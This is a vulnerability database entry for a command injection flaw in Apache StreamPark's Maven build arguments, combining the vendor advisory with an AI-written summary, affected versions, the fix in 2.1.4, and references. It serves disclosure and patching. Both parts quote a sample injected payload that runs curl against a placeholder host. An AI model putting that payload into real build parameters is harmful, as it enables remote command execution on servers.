Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
Description
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4, The "<" operator will blocked。
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
In Apache StreamPark before 2.1.4, the Maven build args input in the Project module lacks strict validation, allowing authenticated users with system-level permissions to inject commands via the '<' operator, leading to remote command execution.
Vulnerability
Overview
CVE-2023-52291 is a low-severity command injection vulnerability found in Apache StreamPark (incubating) versions 2.0.0 through 2.1.3. The flaw resides in the Project module, which integrates Maven's compilation capabilities. The input parameter for Maven build arguments is not rigorously validated, allowing an attacker to inject arbitrary operating system commands by using the '<' operator. For example, a malicious build arg like < (curl http://xxx.com) would be executed as a command injection [1][3].
Attack
Requirements and Exploitation
Exploitation of this vulnerability requires the attacker to be an authenticated user with system-level permissions within the StreamPark application. The attacker must have the ability to create or modify a project's Maven build configuration. The '<' character is typically used in shell command substitution contexts, and the application passes user-supplied build arguments to a shell without proper sanitization. This allows the attacker to break out of the intended command and execute arbitrary OS commands [1][3].
Impact
If successfully exploited, an authenticated attacker with sufficient privileges can achieve remote command execution on the server hosting StreamPark. This could lead to full compromise of the application and underlying system, including data exfiltration, lateral movement, or disruption of streaming processing workloads. However, the official advisory rates the risk as very low because it requires both authentication and elevated permissions, and typical users are unlikely to input dangerous commands manually [1][2].
Mitigation
The vulnerability is fixed in Apache StreamPark version 2.1.4, released in July 2024. The fix specifically blocks the '<' operator in Maven build arguments. Users running versions 2.0.0 through 2.1.3 should upgrade to 2.1.4 or later. No workarounds other than upgrading are documented [1][3].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.apache.streampark:streamparkMaven | < 2.1.4 | 2.1.4 |
Affected products
2- Apache Software Foundation/Apache StreamPark (incubating)v5Range: 2.0.0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4- github.com/advisories/GHSA-7g94-hfqc-q993ghsaADVISORY
- lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkfghsavendor-advisoryWEB
- nvd.nist.gov/vuln/detail/CVE-2023-52291ghsaADVISORY
- www.openwall.com/lists/oss-security/2024/07/17/1ghsaWEB
News mentions
0No linked articles in our index yet.